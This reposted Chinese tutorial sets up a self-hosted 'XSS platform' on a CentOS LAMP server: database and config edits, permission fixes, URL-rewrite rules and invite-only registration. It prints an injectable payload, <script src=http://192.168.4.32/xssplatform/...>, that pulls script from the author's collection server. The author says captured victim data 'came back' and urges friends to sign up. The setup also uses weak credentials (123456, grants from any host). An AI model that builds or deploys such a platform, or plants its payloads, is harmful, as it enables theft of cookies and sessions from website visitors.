作者:Route 来源: 转载请注明,违者必究
原文:

这次xss平台搭建选用的是centos系统,其他linux也差不多。
0x01 LAMP环境的搭建
首先是下载apache的环境,centos已经集成好了。

linux下搭建xss平台


然后当然是一大堆信息,最后显示Complete!成功了

然后安装php环境,可以解析php的内容。

OK,安装完毕,我们测试下,centos中安装完apache默认的网站根路径在/var/www/html/下,我们建立一个index.php文件作为测试:

使用vim打开,我们填入phpinfo函数

linux下搭建xss平台


当然就是这样,打开HTTP服务测试页面:

linux下搭建xss平台


有一个报错,是因为没有配置域名,只要在/etc/httpd/conf/httpd.conf文件中配置ServiceName就不会报错了。等下修改配置apache配置文件的时候一起截图。OK,测试一下,phpinfo的页面出来了

linux下搭建xss平台


然后当然是数据库的支持,首先要下载mysql数据库

两个组件,一个mysql连接器一个服务器。
下载完数据库首先要将数据库初始化一下,

linux下搭建xss平台


使用
service mysqld start 
首次启动mysql初始化,再使用
mysqladmin -u root password '密码'
给root设置一个密码。
OK数据库就安装完成,接着安装php对数据库的支持。

linux下搭建xss平台


重启apache服务,刷新phpinfo页面



linux下搭建xss平台


往下翻,找到这两个说明php和mysql已经连接完成了。LAMP环境搭建完毕。

0x02 让xss跑起来
上传xss的源码。并解压。

很简单的命令,你懂的。

linux下搭建xss平台


linux下搭建xss平台


OK,文件齐全,下面开始配置。
首先要给xss环境准备一个数据库和数据库的用户(当然也能用root,用root麻烦会少一点)
进入数据库配置:

linux下搭建xss平台


mysql -u root -p
链接进入本地数据库。

linux下搭建xss平台


创建了xss数据库和xsser用户,xsser用户的密码设定为123456
刚刚创建的xsser用户 是没有权限的。我们把xss数据库的所有权限赋给xsser。


GRANT ALL PRIVILEGES ON xss.* TO 'xsser'@'%' IDENTIFIED BY '123456';
OK,数据库基础准备好了,我们去修改下config文件,让xss平台能和数据库交互。

linux下搭建xss平台


用vim打开config.php

linux下搭建xss平台


这里几个部分修改下。改完如下:

linux下搭建xss平台


下面把xss平台的初始数据(xssplantform.sql文件)导入进我们的mysql

linux下搭建xss平台


OK查看下数据库

linux下搭建xss平台


都有了,当然,还差一个文件权限的问题。现在访问是空白

linux下搭建xss平台

可以看到整个文件都是属于root的,所以我们改变下权限,让他属于apache的内建用户apache。

linux下搭建xss平台



linux下搭建xss平台


OK都是apache的了。
刷新下页面

linux下搭建xss平台


到此我们的平台跑起来了。
0x03 蛋疼的调整们
当然,现在点注册还是没有效果的,还需要做一些修改
首先进入数据库,将oc_module中的内容改为自己的IP或域名

linux下搭建xss平台


然后这里旧版本的源码需要把/var/www/html/themes/default/templates/register.html里面53行的button改为submit。

linux下搭建xss平台


改完为了保险起见,把/var/www/html/templates_c/目录下的临时文件删除。重启httpd。

重新打开我们的网页,OK可以注册了。



但是这里注册的时候会出这样的问题。

好吧,这个问题我拍错的时候搞了半天,问题有点奇葩,先说解决方法吧,在config.php文件里面,将第九行的数据库地址改成localhost。

linux下搭建xss平台


因为我搭建了不止一次,在写文章的时候把数据库地址改成127就报错,改成localhost就OK。当然,不排除改成localhost以后还会报错的情况,如果出现还报错的情况,我从我经验上来讲(因为没想通原理),用root用户连上数据库,加上这样一句话:
GRANT ALL PRIVILEGES ON xss.* TO 'xsser'@'localhost' IDENTIFIED BY '123456';
给数据库用户赋予一个本地登录权限,再进行测试,如果还是不行,把config.php文件里面的用户改成root用户,再测试。当然这里面的每一步修改都需要重启apache服务器。
别忘记命令:
service httpd restart
千辛万苦,终于看到了

linux下搭建xss平台


linux下搭建xss平台



0x04 这是最后....最后...

好,终于进入最后一步,测试XSS能否使用,并邀请小伙伴们注册。

linux下搭建xss平台


来创建一个项目吧。

linux下搭建xss平台


linux下搭建xss平台


linux下搭建xss平台


当然,我的项目代码在这里也显示了,复制出来
<script src=http://192.168.4.32/xssplatform/TNMaJe?1377587267></script>
测试一下:

linux下搭建xss平台


打开它,看看x到没,哎呦我去,貌似没有- -。

linux下搭建xss平台


分析一下

linux下搭建xss平台


404了,想了下,可能是url重写的问题,在网站根目录下,创建一个.htaccess的隐藏文件

linux下搭建xss平台


直接给出内容吧:

linux下搭建xss平台


<IfModule mod_rewrite.c>
        RewriteEngine on
        RewriteRule ^([0-9a-zA-Z]{6})$ index.php?do=code&urlKey=$1
        RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ index.php?do=do&auth=$1&domain=$3
        RewriteRule ^register/(.*?)$ index.php?do=register&key=$1 
        RewriteRule ^register-validate/(.*?)$ index.php?do=register&act=validate&key=$1
        RewriteRule ^login$ index.php?do=login
</IfModule>
还记得,去修改下/etc/http/conf/httpd.conf文件

linux下搭建xss平台


搜索一下AllowOverride,应该是在这里,把None改成All。

linux下搭建xss平台


重启下httpd服务,我们要开始了。

linux下搭建xss平台


抓包显示访问都正常了

linux下搭建xss平台


最想要的东西也回来了。
好东西怎么能一个人独享,赶快叫小伙伴们来加入吧。
将config.php文件改下:

linux下搭建xss平台


还记得他吧,然后给我们自己的用户加上可以邀请的权限,连接下数据库,

linux下搭建xss平台


好吧,为了测试我创建了很多用户,我们现在用的是nimei这个用户,需要把他的adminLevel权限改成1

linux下搭建xss平台


UPDATE oc_user SET adminLevel=1 WHERE id=4;
把自己的用户登出再登陆一下,访问
?do=user&act=invite
这个页面

linux下搭建xss平台


发给小伙伴,来注册吧